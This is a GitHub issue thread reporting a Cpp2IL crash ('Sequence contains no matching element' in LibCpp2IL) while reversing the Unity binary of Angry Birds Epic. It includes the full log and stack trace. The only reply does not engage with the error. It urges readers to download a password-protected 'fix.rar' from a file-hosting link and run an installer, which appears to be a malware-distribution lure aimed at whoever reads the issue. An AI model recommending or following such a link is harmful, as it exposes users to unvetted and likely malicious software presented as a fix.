### ISSUE TITLE
Fatal Exception initializing LibCpp2IL

### ISSUE THREAD

**Issue by gompoc** [SamboyCoding/AudicaShredder#331]
From support channel in discord:

Game: Angry Birds Epic
Log: 
```
===Cpp2IL by Samboy063===
A Tool to Reverse Unity's "il2cpp" Build Process.
Version 2022.1.0-pre-release.17+fa86c0910de2e852a320bbc6b897293ced9ff3f2

[Info] [Program] Running on Win32NT
[Info] [Plugins] Loading plugins from E:\Plugins...
[Info] [Plugins] Using Plugin: Cpp2IL Built-In
[Warn] [Program] Using force options, I sure hope you know what you're doing!
[Info] [Library] Initializing Metadata...
[Info] [Library]        Using actual IL2CPP Metadata version 23
[Info] [Library] Initialized Metadata in 253ms
[Info] [Library] Using binary type ELF (from LibCpp2IL)
[Info] [Library] Searching Binary for Required Data...
[Info] [Library] Got Binary codereg: 0x1DBAD28, metareg: 0x1DBAD60 in 301ms.
[Info] [Library] Initializing Binary...
[Info] [Library] Initialized Binary in 56ms
[Info] [Library] Mapping Globals...OK (11ms)
[Info] [Library] Mapping pointers to Il2CppMethodDefinitions...Processed 57393 OK (42ms)
[Fail] [Program]

Cpp2IL.Core.Exceptions.LibCpp2ILInitializationException: Fatal Exception initializing LibCpp2IL!
 ---> System.InvalidOperationException: Sequence contains no matching element
   at System.Linq.ThrowHelper.ThrowNoMatchException()
   at System.Linq.Enumerable.First[TSource](IEnumerable`1, Func`2)
   at LibCpp2IL.Reflection.LibCpp2IlReflection.InitCaches() in C:\Users\Sam\RiderProjects\Cpp2IL\LibCpp2IL\Reflection\LibCpp2IlReflection.cs:line 46
   at LibCpp2IL.LibCpp2IlMain.Initialize(Byte[], Byte[], UnityVersion) in C:\Users\Sam\RiderProjects\Cpp2IL\LibCpp2IL\LibCpp2IlMain.cs:line 193
   at LibCpp2IL.LibCpp2IlMain.LoadFromFile(String, String, UnityVersion) in C:\Users\Sam\RiderProjects\Cpp2IL\LibCpp2IL\LibCpp2IlMain.cs:line 208
   at Cpp2IL.Core.Cpp2IlApi.InitializeLibCpp2Il(String, String, UnityVersion, Boolean ) in C:\Users\Sam\RiderProjects\Cpp2IL\Cpp2IL.Core\Cpp2IlApi.cs:line 65
   --- End of inner exception stack trace ---
   at Cpp2IL.Core.Cpp2IlApi.InitializeLibCpp2Il(String, String, UnityVersion, Boolean ) in C:\Users\Sam\RiderProjects\Cpp2IL\Cpp2IL.Core\Cpp2IlApi.cs:line 71
   at Cpp2IL.Program.MainWithArgs(Cpp2IlRuntimeArgs runtimeArgs) in C:\Users\Sam\RiderProjects\Cpp2IL\Cpp2IL\Program.cs:line 588
   at Cpp2IL.Program.Main(String[] args) in C:\Users\Sam\RiderProjects\Cpp2IL\Cpp2IL\Program.cs:line 526

Waiting for you to press enter - feel free to copy the error...
```

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
